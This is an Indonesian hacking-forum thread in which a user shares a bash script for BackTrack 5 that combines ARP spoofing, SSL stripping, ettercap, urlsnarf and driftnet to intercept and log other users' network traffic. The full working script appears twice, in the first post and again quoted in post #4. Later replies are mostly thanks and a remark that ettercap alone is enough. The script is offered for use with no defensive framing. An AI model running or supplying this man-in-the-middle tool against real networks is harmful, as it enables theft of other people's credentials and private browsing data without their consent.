script sniffing backtrack 5
#1
just share oms, script sniffing yang kemarin hanya bisa jalan di backtrack 4R2, sekarang sdh bisa jalan di backtrack 5.

gHero,cseven,spudgunman.
kembali mengeluarkan versi 0.3

Code:
#!/bin/bash

# Script for sniffing https connections.
# Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
# Tested on BT5
# BY gHero,cseven,spudgunman.
# Ver 0.3

# ASCII sniff.sh
echo '
              .__  _____  _____           .__
  ______ ____ |__|/ ____\/ ____\     _____|  |__
/  ___//    \|  \   __\\   __\     /  ___/  |  \
\___ \|   |  \  ||  |   |  |       \___ \|   Y  \
/____  >___|  /__||__|   |__|    /\/____  >___|  /
     \/     \/                   \/     \/     \/
'


echo '1' > /proc/sys/net/ipv4/ip_forward

iptables --flush
sleep 1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


# Arpspoof
echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
read ARPOP

if [ "$ARPOP" == "T" ] ; then
echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
read IP1
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'; bash' &

else

echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'; bash' &

fi

# SSLSTRIP
xterm -fg green4 -bg grey0 -e 'python /pentest/web/sslstrip/sslstrip.py -a -w ssl_log.txt ; bash' &

# ETTERCAP
xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT' ; bash' &

# URLSNARF
xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt ; bash' &

# DRIFTNET
driftnet -p -i $INT &

NOTE: saya edit pake tag code ya, klo skrip usahakan pakai code biar identik dengan aslinya. thx
Konspirasi

#2
ooh jadi ada reviewnya ya untuk backtrack 5 ..seep klo gitu bro

udah di post yang berlaku di backtrack 4 di mari
http://forum.indonesianbacktrack.or.id/s...hp?tid=310

#3
makasih oms konsfirasi, pengennya ane buat begitu, tapi tdk tau Big Grin

#4
(09-25-2011, 07:52 AM)snail_venom Wrote: just share oms, script sniffing yang kemarin hanya bisa jalan di backtrack 4R2, sekarang sdh bisa jalan di backtrack 5.

gHero,cseven,spudgunman.
kembali mengeluarkan versi 0.3

Code:
#!/bin/bash

# Script for sniffing https connections.
# Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
# Tested on BT5
# BY gHero,cseven,spudgunman.
# Ver 0.3

# ASCII sniff.sh
echo '
              .__  _____  _____           .__
  ______ ____ |__|/ ____\/ ____\     _____|  |__
/  ___//    \|  \   __\\   __\     /  ___/  |  \
\___ \|   |  \  ||  |   |  |       \___ \|   Y  \
/____  >___|  /__||__|   |__|    /\/____  >___|  /
     \/     \/                   \/     \/     \/
'


echo '1' > /proc/sys/net/ipv4/ip_forward

iptables --flush
sleep 1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


# Arpspoof
echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
read ARPOP

if [ "$ARPOP" == "T" ] ; then
echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
read IP1
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'; bash' &

else

echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'; bash' &

fi

# SSLSTRIP
xterm -fg green4 -bg grey0 -e 'python /pentest/web/sslstrip/sslstrip.py -a -w ssl_log.txt ; bash' &

# ETTERCAP
xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT' ; bash' &

# URLSNARF
xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt ; bash' &

# DRIFTNET
driftnet -p -i $INT &

NOTE: saya edit pake tag code ya, klo skrip usahakan pakai code biar identik dengan aslinya. thx
Konspirasi
dicoba om/// thanks ya.

#5
mantap om, ijin coba
terus berbagi ya Smile
[shcode=This_site_xss-ed]

#6
udah ga perlu pake script segala......pake ettercap aja cukup di BT5 R1

#7
(10-11-2011, 11:22 AM)gtx150 Wrote: udah ga perlu pake script segala......pake ettercap aja cukup di BT5 R1

ho oh betul omz Big Grin Smile

#8
(10-11-2011, 12:22 PM)junior.riau18 Wrote:
(10-11-2011, 11:22 AM)gtx150 Wrote: udah ga perlu pake script segala......pake ettercap aja cukup di BT5 R1

ho oh betul omz Big Grin Smile

sepertinya patut dicoba kan om....#sotoy

#9
Ko' ane blom bz om... pas gue jalanin langsung hilang

#10
ijin mencoba om....






Users browsing this thread: 1 Guest(s)